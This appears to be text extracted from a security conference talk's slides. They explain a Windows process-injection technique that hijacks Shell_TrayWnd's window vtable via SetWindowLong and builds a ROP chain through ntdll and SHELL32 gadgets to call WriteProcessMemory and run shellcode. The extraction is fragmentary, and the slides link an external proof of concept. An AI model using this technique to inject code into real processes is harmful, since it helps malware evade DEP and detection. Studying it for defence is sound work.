    VirtualAllocEx() Shellcode VirtualAllocEx() & WriteProcessMemory() +0 lParam (this) +4 hWnd Fake Memory Layout ... Malware.exe +0 lParam (vtable)

  141. [email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ...

    WriteProcessMemory() Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... Malware.exe +0 lParam (vtable)

  142. [email protected] Shell_TrayWnd +0 Point to (Fake Memory +4) +4 hWnd

    ... ... Process ... Process Explorer.exe Shell_TrayWnd ... Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... SetWindowLong() Malware.exe

  143. [email protected] +0 Point to (Fake Memory +4) Shell_TrayWnd +4 hWnd

    ... ... Process ... Process Explorer.exe Shell_TrayWnd Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... SendMessage, SendNotifyMessage, or PostMessage to Shell_TrayWnd Malware.exe

  144. [email protected] Demo

  145. [email protected] PowerLoadEx

  146. [email protected]

  147. [email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam)

    { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

  148. [email protected] /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama

    = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); We Have Three Chances!

  149. [email protected] ... Process Process Explorer.exe Window A +0 lParam (vtable)

    +4 hWnd ... Window Class Window A +0 lParam (vtable) +4 hWnd ... Malware.exe ...

  150. [email protected] ... Process ... Process Explorer.exe Window A Window A

    Window B Window B Window C Window C Malware.exe ... ...

  151. [email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +0 lParam (vtable)

    +4 hWnd ... Window A Fake Memory Layout Malware.exe Window A +0 lParam (vtable) +4 hWnd ...

  152. [email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ...

    Window A Fake Memory Layout Malware.exe Window A +4 hWnd ... +8, +16, +24 ... Shellcode +0 lParam (vtable) +0 lParam (vtable)

  153. [email protected] We have three arbitrary Eip points, but... Memory of

    Window Struct is mapped Read and Written Only (RW), No Executable.

  154. [email protected] ROP! Return-oriented programming

  155. [email protected] 「啊,好像棋盤似的。」 「我看倒有點像稿紙。」我說。 「真像⼀一塊塊綠⾖豆糕。」 ⼀一位外號叫「⼤大食客」的同學緊接著說。 雅量量

  156. [email protected] 35, 31, c0, 90, c3 0: 35 31 c0

    90 c3 xor eax, 0xc390c031 0: 31 c0 xor eax,eax 2: 90 nop 3: c3 ret 2: 90 nop 3: c3 ret

  157. [email protected] –aaaddress1 ROP 是⼀一件 非常有雅量量的事情

  158. [email protected] somewhere: ret Process Explorer.exe Stack 0xdead 0xbeef 0xcafe 0xdead:

    xor eax,eax ret 0xbeef: inc al ret 0xcafe: push eax ret

  159. [email protected] But We cannot control data on stack, How do

    we make ROP Chain work?

  160. [email protected] #1 Chance: (void(*)())*wndSelf(wndSelf); .text:00412015 mov ebx, [ebp+hWnd] .text:00412018 push

    0 ; nIndex .text:0041201A push ebx ; hWnd .text:0041201B call GetWindowLongW(x,x) .text:00412021 mov esi, eax .text:0041202B mov eax, [esi] .text:0041202D push esi .text:0041202E call dword ptr [eax] We can set it point to ntdll!KiUserApcDispatcher()

  161. [email protected] .text:77F06F98 _KiUserApcDispatcher@16 proc near .text:77F06F98 lea eax, [esp+arg_2D8] .text:77F06F9F

    mov ecx, large fs:0 .text:77F06FA6 mov edx, _KiUserApcExceptionHandler .text:77F06FAB mov [eax], ecx .text:77F06FAD mov [eax+4], edx .text:77F06FB0 mov large fs:0, eax .text:77F06FB6 pop eax .text:77F06FB7 lea edi, [esp-4+Context] .text:77F06FBB call eax .text:77F06FBD mov ecx, [edi+2CCh] .text:77F06FC3 mov large fs:0, ecx .text:77F06FCA push 1 ; TestAlert .text:77F06FCC push edi ; Context .text:77F06FCD call _ZwContinue@8 .text:77F06FD2 mov esi, eax

  162. [email protected] #2 Chance: (*wndSelf+0x08)(x, x, x, x, x); .text:00412030 push

    [ebp+arg_C] .text:00412033 mov eax, [esi] .text:00412035 push [ebp+wParam] .text:00412038 mov ecx, esi .text:0041203A push edi .text:0041203B push ebx .text:0041203C call dword ptr [eax+8] We can set it to point to a Gadget

  163. [email protected] #2 Chance: (*wndSelf+0x08)(x, x, x, x, x); SHELL32:75C82511 std

    SHELL32:75C82512 ret Set Direction flag(DF) = 1, Now MOVS instruction will decrease ESI/EDI on every operation.

  164. [email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); .text:0041204E mov eax, [esi] .text:00412050 push

    esi .text:00412051 call dword ptr [eax+4]

  165. [email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep

    movsd SHELL32:75C8091C pop edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 Copy 0x94 * sizeof(DWORD) bytes from ESI (Window Memory) to EDI(Stack Memory)

  166. [email protected] #3 Chance: (void(*)())(*wndSelf+0x04)(wndSelf); SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep

    movsd SHELL32:75C8091C pop edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 Copy 0x94 * sizeof(DWORD) bytes from ESI (Window Memory) to EDI(Stack Memory) Stack Controllable! Control Return Address, #4 Chance!

  167. [email protected] SHELL32:75C80915 mov ecx, 94h SHELL32:75C8091A rep movsd SHELL32:75C8091C pop

    edi SHELL32:75C8091D xor eax, eax SHELL32:75C8091F pop esi SHELL32:75C80920 pop ebp SHELL32:75C80921 retn 8 kernel32!7568E0E0 cld kernel32!7568E0E1 retn ntdll!7730289D: pop eax retn #4 Chance ntdll!alloca_probe: push ecx lea ecx, [esp+4] sub ecx, eax ... retn Use out of stack memory, Allocate local memory via alloca_probe()

  168. [email protected] #4 Chance ntdll!_chkstk(alloca_probe): push ecx lea ecx, [esp+4] sub

    ecx, eax ... retn kernel32!WriteProcessMemory: mov edi, edi push ebp mov ebp, esp pop ebp ... retn ntdll!atan: ... Shellcode ... Stack: xxxx24 772BE4A6 (return) xxxx28 FFFFFFFF (current process) xxxx2C 772D48C0 (ntdll!atan) xxxx30 007F1408 (shellcode ) xxxx34 00000070 (byte count) xxxx38 00000000 (null)

  169. [email protected] Demo

  170. [email protected] Facebook: 馬聖豪 Twitter: @aaaddress1 Email: [email protected] PoC: github.com/aaaddress1/winInject101 Thanks!